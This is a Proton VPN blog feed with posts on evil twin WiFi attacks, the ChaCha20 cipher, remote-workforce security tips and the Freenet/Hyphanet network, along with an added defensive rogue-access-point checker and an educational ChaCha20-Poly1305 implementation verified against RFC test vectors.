Proton VPN Blog (https://protonvpn.com/blog/): Free VPN News

What is an evil twin attack, and should they worry you?
https://protonvpn.com/blog/evil-twin/ (Fri, 26 Jan 2024 13:18:08 +0000)

The post What is an evil twin attack, and should they worry you? appeared first on Proton VPN Blog.

An evil twin attack is a cyberattack that occurs when an attacker  sets up a malicious WiFi network that mimics a legitimate one, often in public places like coffee shops, airports, or hotels. 

This rogue WiFi network is the “evil twin” of a legitimate network, designed to deceive you into connecting to it instead of the real network. 

Once you connect to this fake network, the attacker can intercept the unencrypted data you transmit over it, including sensitive information like your usernames and passwords, credit card numbers, and other personal data.

In this article, we’ll look at how evil twin attacks work and discuss why evil twin hotspots are, in reality, no longer a major threat.

How an evil twin attack works

You can break down an evil twin attack into the following steps: 

1. Setup

The attacker sets up a WiFi hotspot with a name (SSID) that closely resembles a legitimate one in the area. For example, it might have a name that resembles that of the coffee shop you’re sitting in or something like “Free Airport WiFi” at an airport.

Learn more about SSIDs and how they can be faked

2. Deception

You unsuspectingly connect to the malicious WiFi network, thinking it’s legitimate.

3. Data Interception

Once you connect, the attacker can eavesdrop on your unencrypted internet activity (including capturing passwords and payment details as you enter them), potentially inject malware, or redirect you to phishing sites.
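As an added, defender-side illustration (it is not part of the original post), the following Python script shows the checks a network operator or a cautious client could run over WiFi scan results to surface the pattern the three steps above produce: a known SSID suddenly advertised by an unknown radio (BSSID), the same name offered without the encryption the real network uses, or a look-alike name. The access-point inventory and the scan entries are constructed sample data, and the function and class names are hypothetical ones written for this example.

```python
# Added example (not from the Proton VPN post): flag the signs of an evil twin
# in a list of access points seen in a WiFi scan, given an inventory of the
# legitimate access points. Inventory and scan data below are constructed.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPoint:
    ssid: str      # network name shown to the user
    bssid: str     # MAC address of the radio advertising it
    security: str  # "open", "wpa2" or "wpa3"


SECURITY_RANK = {"open": 0, "wpa2": 1, "wpa3": 2}


def normalise(ssid: str) -> str:
    """Collapse case, whitespace and separators so 'Cafe-Guest' ~ 'cafe guest'."""
    return re.sub(r"[\s_\-]+", "", ssid).casefold()


def find_evil_twin_candidates(known, observed):
    """Return (reason, access_point) pairs for suspicious scan entries.

    known:    the operator's inventory of legitimate access points
    observed: access points seen in a scan (unrelated networks are ignored)
    """
    by_ssid = {}
    for ap in known:
        by_ssid.setdefault(ap.ssid, []).append(ap)
    by_norm = {normalise(ssid): ssid for ssid in by_ssid}
    findings = []
    for ap in observed:
        if ap.ssid in by_ssid:
            legit = by_ssid[ap.ssid]
            if ap.bssid.lower() not in {k.bssid.lower() for k in legit}:
                findings.append(("unknown BSSID for known SSID", ap))
            weakest_legit = min(SECURITY_RANK[k.security] for k in legit)
            if SECURITY_RANK[ap.security] < weakest_legit:
                findings.append(("weaker security than the real network", ap))
        elif normalise(ap.ssid) in by_norm:
            findings.append((f"look-alike of '{by_norm[normalise(ap.ssid)]}'", ap))
    return findings


# Constructed inventory: the coffee shop runs two WPA2 radios for one SSID.
KNOWN = [
    AccessPoint("Cafe Guest", "aa:bb:cc:00:00:01", "wpa2"),
    AccessPoint("Cafe Guest", "aa:bb:cc:00:00:02", "wpa2"),
]

# Constructed scan: one real radio, one twin, one look-alike, one unrelated AP.
SCAN = [
    AccessPoint("Cafe Guest", "aa:bb:cc:00:00:01", "wpa2"),
    AccessPoint("Cafe Guest", "de:ad:be:ef:00:01", "open"),
    AccessPoint("cafe-guest", "de:ad:be:ef:00:02", "open"),
    AccessPoint("Neighbour5G", "11:22:33:44:55:66", "wpa3"),
]

if __name__ == "__main__":
    for reason, ap in find_evil_twin_candidates(KNOWN, SCAN):
        print(f"{ap.ssid!r} from {ap.bssid} ({ap.security}): {reason}")
```

Run as-is, the script reports the open "Cafe Guest" twin twice (unknown radio, and no encryption) and the "cafe-guest" look-alike once, while the genuine radio and the unrelated network pass. A matching BSSID is not proof of legitimacy, since a rogue access point can copy that as well, so treat the output as an alert to investigate rather than a verdict.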

Most connections are now encrypted 

Until a few years ago, evil twin hotspots run by opportunistic hackers were a serious menace to anyone who used public WiFi networks. 

This was because most online connections (such as the connection between your device and a website) were unencrypted. Data was sent in plaintext, meaning that if you were tricked into connecting to an evil twin hotspot, the hacker running it could see everything you did on most websites you visited. The best defense against such attacks was to use a VPN (which we’ll discuss later). 

The dangers of a largely unencrypted internet went far beyond just those posed by public WiFi hackers, as it allowed pretty much anyone to see everything you did on the internet. To combat this pervasive threat, the non-profit Let’s Encrypt campaign started issuing free HTTPS certificates to anyone who asked for them in 2015. 

Now used by over 300 million websites, Let’s Encrypt quickly became the world’s largest certificate authority (CA) and kickstarted an encryption revolution on the web. As of January 2024, 85.1% of all websites use the HTTPS protocol (that figure rises to almost 100% for websites that deal with sensitive data, such as websites that process payments). 

When a website uses HTTPS, its connection to your browser or mobile app is securely encrypted. This prevents hackers and anyone else (such as your WiFi host, ISP, or government) from accessing your data or knowing what you did on a website. 

Learn how HTTPS keeps your connections safe (if not private)

As long as HTTPS is used, attackers can’t use evil twin hotspots to spy on your browsing, even if you’re connected to their network. All modern browsers clearly warn you when visiting a website not secured by HTTPS. 

There is still some theoretical danger from evil twin attacks if you visit the 15% of websites that don’t use HTTPS, but as these are mainly “trash sites” that are obviously insecure, the danger is minimal. Perhaps even more importantly, the chances of a hacker gaining valuable information through an evil twin attack are so low these days that there’s little reason for them to bother trying.

The same is also true of WiFi sniffing attacks that attempt to intercept unencrypted data sent over public WiFi networks, which used to be the other big danger for anyone using a public hotspot. The result is that using public WiFi is much safer than it used to be, and the chances of your data being stolen by a criminal hacker are now minimal.

You should still use a VPN on public WiFi

HTTPS keeps your connections secure — but not private. It prevents criminals from seeing what you do on a website (including any passwords or payment details you enter), but it doesn’t prevent your Internet Service Provider (ISP) or public WiFi host (the person or business who operates the WiFi hotspot you’re connected to) from seeing which websites and services you connect to. And in this age of ubiquitous surveillance capitalism, where everything we do online is monitored and used to target us with ever more personalized ads, this is valuable information. 

There is a reason many public WiFi networks (many of which are operated by commercial third-party companies) require you to provide a valid email address and agree to an intimidatingly long and impenetrable Terms of Service (ToS) agreement before allowing you to use the “free” WiFi. They are selling your browsing history to advertisers. 

Using a virtual private network (VPN) prevents this. It creates an encrypted tunnel between your device and a VPN server so no one else can see what you do online. This includes WiFi operators and your ISP. 

Diagram showing VPNs protect your privacy

Learn more about how VPNs work

The VPN provider running the VPN server can see what you do online, but (unlike your ISP or public WiFi host) it’s in the business of protecting your privacy. A good VPN service (such as Proton VPN) keeps no logs of your online activity.

Final thoughts: how do you prevent an evil twin attack?

Thanks to the widespread adoption of HTTPS, you don’t really need to worry about evil twin attacks anymore. If they do still concern you, using a good VPN service will provide you with an extra layer of protection and ensure you can visit even non-HTTPS websites safely. 

More importantly, a VPN will protect your privacy when using public WiFi networks, ensuring the WiFi host can’t log your browsing history and sell it to advertisers.  

What is ChaCha20?
https://protonvpn.com/blog/chacha20/ (Thu, 28 Dec 2023 20:20:07 +0000)

ChaCha20 is a performant and lightweight, yet highly secure, 256-bit stream cipher used to encrypt and decrypt data. It’s often used to secure data transmitted online, such as emails, messages, web traffic, and files being uploaded to the cloud. 

You could think of ChaCha20 as a specialized, highly secure safe. When you encrypt data with ChaCha20, it’s like putting it inside a safe. This safe (ChaCha20) scrambles the contents (your data) so that it becomes unreadable to anyone who doesn’t have the key. This key is a secret code that only the sender and intended receiver know. If someone else tries to read the data without the key, all they see is gibberish.

Learn more about what encryption is and why it’s important

ChaCha20 performs a very similar function to the older and more established AES encryption cipher, and offers some (fairly minor) security improvements over it.

Learn more about AES encryption

ChaCha20 is often combined with the Poly1305 message authentication code to create the ChaCha20-Poly1305 encryption algorithm, which we explain a bit later in this article.

ChaCha20-Poly1305 and AES-GCM are the only symmetric key encryption ciphers recommended for use with TLS 1.3. While the secure but somewhat aging OpenVPN protocol uses AES to secure data, the new lightweight WireGuard protocol uses ChaCha20-Poly1305. 

ChaCha20 was developed by the American-German mathematician, cryptographer, and computer scientist Daniel J. Bernstein in 2008, and is based on an earlier cipher also developed by Bernstein in 2005 — Salsa20. Bernstein also created the Poly1305 universal hash family that ChaCha20 is often combined with, and the Curve25519 elliptic curve used to secure the WireGuard key exchange. 

In 2014, Google deployed support for a TLS cipher suite using ChaCha20-Poly1305 in its Chrome browser, and this is now supported by all major browsers.

Notable features of ChaCha20

ChaCha20 is a symmetric-key algorithm

Like AES, ChaCha20 uses the same key to both encrypt and decrypt data (there may sometimes be a simple transformation between the two keys, but they are always derived from the same key). 

This is in contrast to asymmetric-key algorithms such as RSA, which use separate public and private keys. Also known as public-key cryptography, these allow you to securely share data over a distance by making the public key widely available for others to encrypt data with, but which can only be decrypted using the correct private key.

Asymmetric-key algorithms require a high level of computational power, which makes them relatively slow, and thus most useful for encrypting small amounts of data. RSA, for example, is used to perform the TLS key exchange that occurs when connecting to an HTTPS website.

WireGuard and modern TLS cipher suites use a newer approach to asymmetric-key encryption — elliptic-curve cryptography (ECC) — to secure key-exchanges. While more efficient than traditional algorithms such as RSA, it’s still relatively slow.

Symmetric-key algorithms such as ChaCha20, on the other hand, require much less processing power than asymmetric-key ciphers (often cited as being around 1,000 times faster). This makes them ideal for encrypting large volumes of data. 

Where large amounts of data need to be transmitted over a distance (such as over the internet), the data itself is encrypted using a symmetric-key algorithm, while the key exchange is secured using an asymmetric-key algorithm.

In the case of TLS (and therefore also OpenVPN), the symmetric-key algorithm is usually AES, with the key exchange certified using RSA. For WireGuard, ChaCha20 is used for symmetric-key encryption, and Curve25519 to secure the key exchange. 

ChaCha20 is often combined with Poly1305

Poly1305 is a type of cryptographic algorithm used to ensure the security and integrity of data — that is, to ensure data hasn’t changed during transit — using a secret key shared between a sender and recipient. It helps ensure that your secret messages remain private and unaltered during transmission, providing a way for both parties to trust the authenticity and integrity of their communication.

To use an analogy, Poly1305 is like putting a special seal on your message that only the person you’re communicating with can recognize. If the seal is intact when they receive it, they know the message is safe and from you. If someone tries to tamper with the message, the seal will break, and the receiver will know that something is wrong.

This is why, when used together, ChaCha20-Poly1305 is referred to as an authenticated encryption with additional data (AEAD) algorithm. Although the math used is different, the concept is very similar to the Galois/Counter Mode (GCM) used with AES (AES-GCM is also an AEAD algorithm). 
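To make the last two sections concrete (ChaCha20 as a symmetric-key stream cipher whose one key both encrypts and decrypts, Poly1305 as the “seal”, and how the two combine into the ChaCha20-Poly1305 AEAD), here is an added worked example written for this page. It is not code from the post, from WireGuard or from Proton VPN; it is a straight pure-Python transcription of the construction in RFC 8439, and it checks itself against that RFC’s published test vectors. Being pure Python it is neither fast nor constant-time, so it is for understanding the algorithm, not for deployment.

```python
# Added example: pure-Python ChaCha20, Poly1305 and ChaCha20-Poly1305 AEAD
# as specified in RFC 8439. Educational only: slow and not constant-time.
import hmac
import struct

MASK32 = 0xFFFFFFFF


def rotl32(v, n):
    """Rotate a 32-bit word left by n bits."""
    return ((v << n) | (v >> (32 - n))) & MASK32


def quarter_round(s, a, b, c, d):
    """ChaCha's add-rotate-xor quarter round on four words of the state list s."""
    s[a] = (s[a] + s[b]) & MASK32; s[d] = rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = rotl32(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block from a 256-bit key, 32-bit block counter
    and 96-bit nonce (state layout of RFC 8439 section 2.3)."""
    assert len(key) == 32 and len(nonce) == 12
    init = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]  # "expand 32-byte k"
    init += struct.unpack("<8I", key)
    init += [counter & MASK32, *struct.unpack("<3I", nonce)]
    s = list(init)
    for _ in range(10):  # 10 double rounds = the 20 rounds in the name
        quarter_round(s, 0, 4, 8, 12); quarter_round(s, 1, 5, 9, 13)   # columns
        quarter_round(s, 2, 6, 10, 14); quarter_round(s, 3, 7, 11, 15)
        quarter_round(s, 0, 5, 10, 15); quarter_round(s, 1, 6, 11, 12)  # diagonals
        quarter_round(s, 2, 7, 8, 13); quarter_round(s, 3, 4, 9, 14)
    # Adding the initial state back in is what makes the block function one-way.
    return struct.pack("<16I", *[(x + y) & MASK32 for x, y in zip(s, init)])


def chacha20_xor(key, counter, nonce, data):
    """XOR data with the keystream: the same call encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 64):
        keystream = chacha20_block(key, counter + i // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[i:i + 64], keystream))
    return bytes(out)


P1305 = (1 << 130) - 5  # the prime that gives Poly1305 its name


def poly1305_mac(otk, msg):
    """Poly1305 one-time authenticator; otk = r (16 bytes) || s (16 bytes)."""
    r = int.from_bytes(otk[:16], "little") & 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF
    s = int.from_bytes(otk[16:32], "little")
    acc = 0
    for i in range(0, len(msg), 16):
        # Each 16-byte chunk (shorter at the end) is a number with a 0x01 byte appended.
        n = int.from_bytes(msg[i:i + 16] + b"\x01", "little")
        acc = ((acc + n) * r) % P1305
    return ((acc + s) & ((1 << 128) - 1)).to_bytes(16, "little")


def _pad16(b):
    return b + b"\x00" * (-len(b) % 16)


def aead_encrypt(key, nonce, aad, plaintext):
    """ChaCha20-Poly1305 seal: returns (ciphertext, 16-byte tag)."""
    otk = chacha20_block(key, 0, nonce)[:32]     # block 0 is the one-time Poly1305 key
    ct = chacha20_xor(key, 1, nonce, plaintext)  # data is encrypted from block 1 on
    mac_data = _pad16(aad) + _pad16(ct) + struct.pack("<QQ", len(aad), len(ct))
    return ct, poly1305_mac(otk, mac_data)


def aead_decrypt(key, nonce, aad, ct, tag):
    """ChaCha20-Poly1305 open: verify the seal first, return None if it is broken."""
    otk = chacha20_block(key, 0, nonce)[:32]
    mac_data = _pad16(aad) + _pad16(ct) + struct.pack("<QQ", len(aad), len(ct))
    if not hmac.compare_digest(poly1305_mac(otk, mac_data), tag):
        return None
    return chacha20_xor(key, 1, nonce, ct)


def rfc8439_self_check():
    """Check the construction against published RFC 8439 test vectors."""
    s = [0x11111111, 0x01020304, 0x9B8D6F43, 0x01234567]          # section 2.1.1
    quarter_round(s, 0, 1, 2, 3)
    qr_ok = s == [0xEA2A92F4, 0xCB1CF8CE, 0x4581472E, 0x5881C4BB]
    otk = bytes.fromhex("85d6be7857556d337f4452fe42d506a80103808afb0db2fd4abff6af4149f51b")
    mac_ok = poly1305_mac(otk, b"Cryptographic Forum Research Group") == \
        bytes.fromhex("a8061dc1305136c6c22b8baf0c0127a9")           # section 2.5.2
    key, nonce = bytes(range(0x80, 0xA0)), bytes.fromhex("070000004041424344454647")
    aad = bytes.fromhex("50515253c0c1c2c3c4c5c6c7")                  # section 2.8.2
    pt = (b"Ladies and Gentlemen of the class of '99: If I could offer you "
          b"only one tip for the future, sunscreen would be it.")
    ct, tag = aead_encrypt(key, nonce, aad, pt)
    aead_ok = tag == bytes.fromhex("1ae10b594f09e26a7e902ecbd0600691")
    tampered = bytes([ct[0] ^ 0x01]) + ct[1:]  # one flipped bit must break the seal
    tamper_ok = aead_decrypt(key, nonce, aad, tampered, tag) is None
    return qr_ok and mac_ok and aead_ok and tamper_ok and aead_decrypt(key, nonce, aad, ct, tag) == pt


if __name__ == "__main__":
    print("RFC 8439 vectors pass:", rfc8439_self_check())
```

The self-check exercises the three things the text describes: the quarter round and block function (the cipher), the Poly1305 tag (the seal), and the combined AEAD, including the case where a single flipped ciphertext bit makes `aead_decrypt` refuse to return anything rather than hand back corrupted plaintext. Note that Poly1305’s one-time key is derived from keystream block 0 of the same key and nonce, which is why a nonce must never be reused with a key; the XChaCha20 section later in the post is about making that easier to guarantee.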

ChaCha20 vs. AES

As we’ve seen, ChaCha20 fulfills a very similar purpose to the older and much more prevalent AES (as ChaCha20-Poly1305 does to AES-GCM). So which is better?

Learn more about AES encryption

Security

Legendary cryptographer Bruce Schneier once explained that “cryptography is all about safety margins. If you can break n rounds of a cipher, you design it with 2n or 3n rounds”. Both AES and ChaCha20 encrypt data using rounds, each consisting of a series of mathematical operations. 

AES-256 uses 14 rounds, while ChaCha20 uses 20 rounds. The number of rounds itself cannot be usefully compared, but in the highly influential paper, Too Much Crypto, its authors set out to “propose numbers of rounds for which we have strong confidence that the algorithm will never be wounded, let alone broken”. Their conclusion recommends that AES-256 only needs 11 rounds (instead of the 14 it uses), while ChaCha20 only needs 8 (instead of the 20 it uses). 

This means ChaCha20 has a higher safety margin than AES-256. However, as the paper’s authors also note about the calculations from which their recommendations arise, “From these surrealist figures, it is obvious that such an attack is only a cryptanalysis exercise and does not have much to do with the real security of AES”. In other words, AES and ChaCha20 are both sufficiently secure mathematically.

But is AES vulnerable in other ways? AES has known vulnerabilities to timing attacks, where the number of combinations required to make a successful brute force attack can be reduced by looking at how long a computer takes to perform an operation (although there are a number of ways to protect against this). 

Thanks to its use of add-rotate-xor operations (a highly complex mathematical procedure that makes it very hard for unauthorized users to understand or modify the information operated on), software implementations of ChaCha20 are much more resistant to such timing attacks. But again, this is all very theoretical. Properly implemented AES and AES-GCM are widely regarded as being unbreakable by any known practical attack. 

Performance

AES performance is often boosted with AES-NI hardware support built into modern processors. However, even with this, ChaCha20 usually offers better performance than AES. 

The biggest gains with ChaCha20-Poly1305 are on hardware that doesn’t support AES-NI acceleration, such as some ARM chips.

What is XChaCha20?

A cryptographic nonce is an arbitrary value used only once to make an operation (such as encryption or hashing) unique. eXtended-nonce ChaCha20 (XChaCha20) is a variant of ChaCha20 that uses a 192-bit nonce instead of a 96-bit nonce. This makes picking a random nonce notably safer, as there’s effectively no chance that it could be re-used. 

(“Bits” refers to the size or length of a cryptographic value such as a key or nonce. In very simple terms, the higher the bit length, the more secure the value.)

However, there is no officially recognized standard for XChaCha20, and the last attempt to establish one failed in 2020. This has led to a slow uptake of the slightly more secure variant. 

Final thoughts

ChaCha20 is a secure and performant symmetric-key algorithm that is closely comparable to the more established AES (as ChaCha20-Poly1305 is to AES-GCM).

It offers some advantages over AES, but these are negligible enough that most major industry players see little advantage in changing over from AES. For many, the main benefit of ChaCha20 is that it offers a “backup” algorithm in the highly unlikely event that a major weakness is discovered in AES (or AES-GCM). 

However, the choice of ChaCha20-Poly1305 over AES-GCM to secure data transmitted using the WireGuard VPN protocol has given new prominence to the algorithm, which may yet have a very bright future. 

8 tips to secure your remote workforce (plus an employee checklist)
https://protonvpn.com/blog/secure-remote-worker/ (Thu, 21 Dec 2023 06:29:59 +0000)

Your remote workforce should be as digitally secure as any in-office workforce. Fortunately, the same tools that can enable you to operate a distributed workplace, like VPNs and collaboration software, can help you keep your data safe too.

In this article, we’ll cover eight steps you can easily take to secure your network — no matter where your employees are working.

  1. Offer reliable, secure hardware and software
  2. Require two-factor authentication
  3. Instruct your employees to change their home router password
  4. Select the right VPN
  5. Ensure VPN use
  6. Limit access to internal servers
  7. Encrypt group calls
  8. Protect employee text messaging

We’ve also included an employee checklist at the end of this article to help you guide your remote employees in securing their work.

What are the threats?

First, it’s important to understand what you’re securing your workplace from.

In most cases, you’re simply trying to protect your company from the common cybercriminals who target all of us online to steal personal data for financial gain. They may not actually be singling out your business, but their impact can be huge. Internet scams cost businesses and individuals a combined $10.3 billion in 2022 in the US alone — and likely more, as cybercrime is underreported. 

These include all kinds of attacks, ranging from phishing to ransomware. If a hacker steals your data and demands payment, you may decide you have no choice but to pay. Or if your customers’ personal data leaks onto the dark web, you could be subject to huge fines for violating data protection laws.

Secure your remote workforce

There are multiple ways to mitigate the risks. Many of these start with prioritizing security, both at a management level and in your employees’ habits. We address this in the checklist below. But apart from training and awareness, there are also technical safeguards you can put in place. Here are eight you can work toward right now.

1. Offer reliable, secure hardware and software

Businesses are responsible for their employees’ hardware and software, even when the devices are outside office walls. Employees may choose hardware and software that are ill-suited or not secure for their work if left on their own. While your employees are responsible for following security best practices, expecting them to assess software and hardware security is unfair and unlikely to lead to good results.

Have a security expert, ideally your IT support team, advise employees on what hardware they should choose, including laptops, printers, cellphones, external microphones for remote meetings, etc.

Also advise them on what basic software they need. This includes office suite software, internet browsers, and email clients.

2. Require two-factor authentication

Whether your employees work from home or the office, you should require two-factor authentication (2FA) on all workplace accounts and encourage it on personal accounts. This adds an extra authentication layer when logging in, so even if an attacker steals someone’s username and password, they won’t be able to access the account. 

2FA should be enabled for email, VPN, chat apps, cloud storage, CRMs, and anywhere else your employees access your network. Typically you can require 2FA from your administrator settings.

3. Instruct your employees to change their home router password

Personal home routers usually come with a default password printed on the bottom. Many people never take the time to change these passwords, making their routers vulnerable to hacking. Make sure your employees change and save their router password, just like they would manage any passwords in the office (using the password manager that you have provided them).

4. Select the right VPN 

As a company with a remote workforce, you need a high-quality VPN, or virtual private network. A VPN will protect your employees’ privacy and security no matter where they are connecting to the internet. We developed Proton VPN for Business specifically to address the most critical security needs of small- and medium-sized businesses.

Here is what to keep in mind when selecting a VPN:

  • High speed — Don’t settle for a VPN that slows your remote workforce down. Proton VPN for Business’s VPN Accelerator technology uses advanced networking techniques to reduce latency, cut down on protocol inefficiencies, and overcome CPU limitations. Plus, all Proton VPN servers have a minimum of 1 Gbps bandwidth, with 10 Gbps servers available if you need them.
  • Secure VPN protocols — Business VPN servers should not support the PPTP and L2TP/IPSec VPN protocols as they aren’t secure. At Proton VPN for Business, we only use the VPN protocols known to be secure. These protocols are WireGuard, OpenVPN, and IKEv2.
  • Strongest encryption — Your remote workers’ security is only as strong as their VPN’s encryption. Proton VPN uses the strongest encryption possible: AES-256 or ChaCha20 for network traffic, 4096-bit RSA for the key exchange, and HMAC with SHA384 for message authentication. Additionally, all our cipher suites use perfect forward secrecy, meaning we generate a new encryption key every time your employee connects to the VPN.
  • Network protection — Proton VPN for Business’s Secure Core servers are in hardened data centers in Switzerland, Iceland, and Sweden, protected with full disk encryption. Proton is also protected by some of the strongest privacy laws in the world since it’s a Switzerland-based company. That’s why we can maintain our strict no-logs policy.
  • Open source and audited — Only trust a VPN that is transparent and independently audited. Our Proton VPN apps are 100% open source. On top of that, we regularly commission independent, professional audits and publicly publish the full results.

5. Ensure VPN use

No matter how advanced your VPN is, if your employees struggle to use it or avoid using it, that VPN is not valuable. 

To ensure VPN use, enable the Always-on and kill switch features that your VPN provider should offer. The Always-on feature ensures your employee’s device always connects to the internet through the VPN server. If that secure connection is lost for any reason, the kill switch feature kicks in and stops traffic to keep your employee safe.

Another common reason remote workers avoid working through a VPN is that they get blocked from websites that interpret them as threats. Proton VPN’s alternative routing technology allows your employees to bypass most firewalls and VPN blocking methods so they can go about their work unimpeded.

6. Limit access to internal servers

Even if you’re a small business, not all employees need access to all internal resources and databases. This kind of access can be especially dangerous if workers are remote. Set up your VPN to control access permissions.

As the admin of the VPN, you can assign an employee or group of employees to one or more dedicated VPN server IP addresses (also known as ‘gateways’) based on what you want them to have access to. Through this segmentation system, your company’s internal server(s) will recognize and allow access requests from the VPN servers you have configured for that permission, rejecting all requests from any other VPN or regular internet servers.

Beyond giving you flexible, granular control of access, this adds an additional layer of protection: Even if a bad actor obtains the username and password to an internal server resource, they will not be able to access it because their device will not be using the assigned VPN server.

7. Encrypt group calls

With remote work comes remote meetings. Make sure you are protecting those meetings.

Wire is a group audio and video conference platform that utilizes zero-knowledge encryption similar to the model we use in Proton services. It can host up to 100 users in a meeting at the same time. It is independently audited and open source.

8. Protect employee text messages and emails

Remote employees are more likely to text and email each other than in-office employees are. As a business, you need to protect that remote work product too. 

Signal is considered the most secure messaging app. It end-to-end encrypts one-on-one messages as well as group messages. It works on both Android and Apple phones, as well as Linux and Windows setups.

Proton Mail is our email service and the largest end-to-end encrypted email provider in the world. It offers advanced features like expiring and password-protected emails, encrypted search, and productivity features like snooze.

Remote employee security checklist

People are usually the weakest link in the security of any system, including your organization’s network. Phishing attacks are designed to take advantage of this fact. To mitigate this, we recommend regular security trainings and reminders.

Below is a security checklist you can share with your employees and modify to suit your workplace as needed.

Use your work device securely

  • Keep non-essential applications off your work device and secure it when not in use, even at home.
  • Lock your device screens with strong passwords any time you are not using them.
  • Report lost or compromised devices immediately to ensure sensitive data is secured.
  • Turn off Bluetooth if you’re not actively using it.

Data encryption

  • Encrypt the hard drives of your work devices to safeguard sensitive data.
  • Activate encryption systems on Android, iOS, macOS, and Windows devices and securely store the recovery codes.

Encrypted communications

  • Use Proton Mail for private and secure communication.
  • Set expiration dates for sensitive messages to enhance privacy.

Update your software

  • Keep all operating systems, programs, and applications up to date. New software versions often contain patches for security vulnerabilities.

Strong passwords

  • Use strong, unique passwords (at least 16 characters) for each account.
  • Utilize a reputable password manager for password management.

Two-factor authentication

  • Enable 2FA on all accounts to add an extra layer of protection.
  • Use an authenticator app such as the one built into Proton Pass rather than SMS or other less secure forms.

Secure network access

  • Avoid sending sensitive information through unsafe external applications.
  • Connect to your work computer through a VPN with secure protocols for added security.

Secure home WiFi network

  • Change the default password on your home WiFi router to a strong, unique one.
  • Enable encryption, preferably WPA2, on your home WiFi to prevent unauthorized access.

VPN usage

  • Connect to your company’s VPN when accessing company resources.

Video conference security

  • Ensure no sensitive information is visible during video conferences or screen sharing.
  • Password-protect all conference calls to prevent unauthorized access.

Stay alert for social engineering and phishing attacks

  • Never click links, download attachments, or scan QR codes from unknown or unexpected senders.
  • Refrain from sharing screenshots of video conferences or sensitive information on social media.

What is Freenet (now called Hyphanet)?
https://protonvpn.com/blog/freenet-hyphanet/ (Mon, 11 Dec 2023 09:35:23 +0000)

Freenet is a decentralized, encrypted, open-source dark web designed to let you communicate with others, upload and download content, and access online information anonymously. 

Learn more about the different dark webs

What’s in a name? 

The original Freenet project dates back to 1999, but recently (March 2023) changed its name to Hyphanet. This is because Ian Clarke, creator of the original Freenet, has started to develop “a successor to Freenet” with “different design priorities”.

This new dark web platform was code-named Locutus, but in mid-2023, the board of Freenet Project, Inc., a non-profit organization that has managed Freenet since 1999, decided to rename the Locutus project to Freenet 2023.

In response, the Freenet community changed the name of the original Freenet to Hyphanet (a reference to underground mycorrhizal fungal networks). 

At the time of writing this article, Freenet 2023 remains firmly at the development stage. An alpha version is available for developers to experiment with, but it isn’t available for general use. This article will therefore focus on Hyphanet.

What is Hyphanet?

Freenet started as a student project by Ian Clarke. This resulted in the widely acclaimed 2001 paper, Freenet: A Distributed Anonymous Information Storage and Retrieval System, which became one of the most frequently cited computer science articles in 2002. 

Unlike other dark web technologies such as Tor and I2P, it’s a pure dark web in that it provides no access to the regular internet. Strictly speaking, it’s a fully distributed, peer-to-peer, anonymous publishing network that offers secure data storage. 

When you join the Hyphanet network, you agree to share a percentage of your local disk space. This space (referred to as a datastore) is securely encrypted, and other Hyphanet members download parts of files from it (similar to BitTorrent). 

However, on top of this basic file-hosting framework, volunteers have developed applications that allow for websites, message boards, and more. A limitation of this system is that websites can’t be dynamic (so they’re always simple static HTML pages). 

An advantage is that web pages (and other data) can be available long after the original host has disappeared. However, if no one accesses data for a long time, it can disappear (this works much like BitTorrent, where files that aren’t actively seeded become de-indexed over time). 

Opennet and darknet

Since 2007, Freenet has offered two “modes” — opennet and darknet. These terms can be somewhat confusing because Freenet’s definitions don’t align with how the public generally understands these terms. 

If you use Hyphanet in opennet mode, you connect to random peers. As such, opennet mode is similar to Tor Onion Services in many ways. If you use it in darknet mode, you only connect to trusted friends with whom you’ve previously exchanged public keys and node references.

It’s these darknets that make Freenet uniquely secure, as it completely blocks outside access to data shared within a darknet group. 

Is Hyphanet safe?

When setting up Hyphanet, you must configure an encrypted datastore on your local disk. This datastore stores fragments of files that other Hyphanet users have uploaded, and you have little or no control over what’s stored there. This prevents Hyphanet users from censoring content by deleting files in their datastore. 

The encryption Hyphanet uses makes it “hard, but not impossible” to determine which files are stored in your local datastore and serves primarily to provide plausible deniability about the nature of the material stored on your local disk. 

Hyphanet was designed to protect the anonymity of those who “insert” (upload) content into the network and “request” (download) it. As with Tor and I2P, you always connect to data stored on Hyphanet indirectly, with your connection first routed through several other nodes in the Hyphanet network. 

Hyphanet bundles packets together and routes them through a varying number of nodes to confuse timing attacks. 

Can Hyphanet be compromised? 

There are a number of reports of law enforcement agencies successfully tracking down Freenet/Hyphanet users, but none of these contain any technical details and have been disputed.

A 2017 paper titled Statistical Detection of Downloaders in Freenet claims to have developed “a passive technique for detecting Freenet downloaders”. But again, this claim is disputed.

How to install Hyphanet

Hyphanet is available as a Windows .exe, Debian .deb, and Gentoo package. You can also install it on macOS or any Linux system as a .jar file (which requires installing Java). 

Installing Hyphanet

The installation wizard does a good job of guiding you through the setup and then launches the Hyphanet portal in a tab on your default browser. However, you’re strongly advised to run Hyphanet with your browser in Private or Incognito mode, so it’s a good idea to copy the local Hyphanet URL, restart your browser in Private or Incognito mode, and then paste the URL.

The Hyphanet installer also offers to install desktop and menu icons on your system to make accessing Hyphanet easy. 

How to use Hyphanet

Unlike with I2P, Hyphanet doesn’t require you to manually configure your browser’s proxy settings. And unlike either I2P or Tor, its main screen provides a host of useful links to get you started, including an index of Hyphanet websites, a search engine, extensive documentation, developer blogs, plus various email, messaging, and chat tools. 

The Hyphanet web portal

As noted, all web pages are static HTML, which prevents trackers and other privacy-invasive scripts from being embedded. These take from a few seconds to around a minute to download (in this reviewer’s experience), which is much faster than I2P pages (again, in this reviewer’s experience). 

Many of the utilities available on Hyphanet require the Web of Trust plugin. This attempts to reduce spam, and to address the fact that anyone can insert content into the Hyphanet network, by giving you a cryptographically verifiable identity with a trust score to which other community members can assign positive or negative ratings.

Final thoughts

With no access to the regular internet, a big problem with Hyphanet in opennet mode is that most content is either pointless (“Hi there!”) or illicit in some way. However, its indexes, such as The Filtered Index featured on Hyphanet’s front page, do provide links to potentially more interesting (and savory) content. 

